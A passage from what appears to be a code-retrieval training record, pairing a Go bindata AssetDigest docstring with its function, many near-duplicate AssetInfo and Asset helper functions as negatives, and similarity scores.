:= Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}" ]
[ "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549", "0.6233549" ]
0.7864623
48
AssetInfo loads and returns the asset info for the given name. It returns an error if the asset could not be found or could not be loaded.
func AssetInfo(name string) (os.FileInfo, error) { canonicalName := strings.Replace(name, "\\", "/", -1) if f, ok := _bindata[canonicalName]; ok { a, err := f() if err != nil { return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err) } return a.info, nil } return nil, fmt.Errorf("AssetInfo %s not found", name) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}", "func AssetInfo(name string) (os.FileInfo, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"AssetInfo %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.info, nil\n\t}\n\treturn nil, fmt.Errorf(\"AssetInfo %s not found\", name)\n}" ]
[ "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727", "0.8059727" ]
0.8134524
51
AssetDigest returns the digest of the file with the given name. It returns an error if the asset could not be found or the digest could not be loaded.
func AssetDigest(name string) ([sha256.Size]byte, error) { canonicalName := strings.Replace(name, "\\", "/", -1) if f, ok := _bindata[canonicalName]; ok { a, err := f() if err != nil { return [sha256.Size]byte{}, fmt.Errorf("AssetDigest %s can't read by error: %v", name, err) } return a.digest, nil } return [sha256.Size]byte{}, fmt.Errorf("AssetDigest %s not found", name) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (a *Asset) Hash(hashType string) (string, error) {\n\tvar hashEncodedLen int\n\tvar hash string\n\n\t// We read the actual asset content\n\tbytes, err := os.ReadFile(a.path)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif len(bytes) == 0 {\n\t\treturn \"\", fmt.Errorf(\"Empty asset file at %s\", a.path)\n\t}\n\n\t// Build the asset hash and convert it to a string.\n\t// We only support SHA512 for now.\n\tswitch hashType {\n\tcase annotations.SHA512:\n\t\thashComputed := sha512.Sum512(bytes)\n\t\thashEncodedLen = hex.EncodedLen(len(hashComputed))\n\t\thashEncoded := make([]byte, hashEncodedLen)\n\t\thex.Encode(hashEncoded, hashComputed[:])\n\t\thash = string(hashEncoded[:])\n\tdefault:\n\t\treturn \"\", fmt.Errorf(\"Invalid hash type %s\", hashType)\n\t}\n\n\ta.computedHash = hash\n\n\treturn hash, nil\n}", "func (a *Asset) Hash() string {\n\treturn fmt.Sprintf(\"%x\", sha256.Sum256(a.Data))\n}", "func (r *Registry) ManifestDigest(reponame, tag string) (string, error) {\n\turl := fmt.Sprintf(\"%s/v2/%s/manifests/%s\", r.URL, reponame, tag)\n\n\tlog.Debugf(\"HEAD %s\", url)\n\n\treq, err := http.NewRequest(http.MethodHead, url, nil)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treq.Header.Add(\"Accept\", \"application/vnd.docker.distribution.manifest.v2+json\")\n\tresp, err := r.Client.Do(req)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer resp.Body.Close()\n\n\tif resp.StatusCode != http.StatusOK {\n\t\treturn \"\", fmt.Errorf(\"Request failed: %s\", resp.Status)\n\t}\n\n\tdigest := resp.Header.Get(\"Docker-Content-Digest\")\n\tif digest == \"\" {\n\t\treturn \"\", errors.New(\"No digest in response\")\n\t}\n\n\tlog.Debugf(\"Found digest %s\", digest)\n\treturn digest, nil\n}", "func (o *ImageImportManifest) GetDigest() string {\n\tif o == nil || o.Digest == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Digest\n}", "func DigestFile(filename string) (string, error) {\n\tb, err := DigestFileBytes(filename)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treturn hex.EncodeToString(b), nil\n}", "func Asset(name string) ([]byte, error) {\n cannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n if f, ok := _bindata[cannonicalName]; ok {\n a, err := f()\n if err != nil {\n return nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n }\n return a.bytes, nil\n }\n return nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", 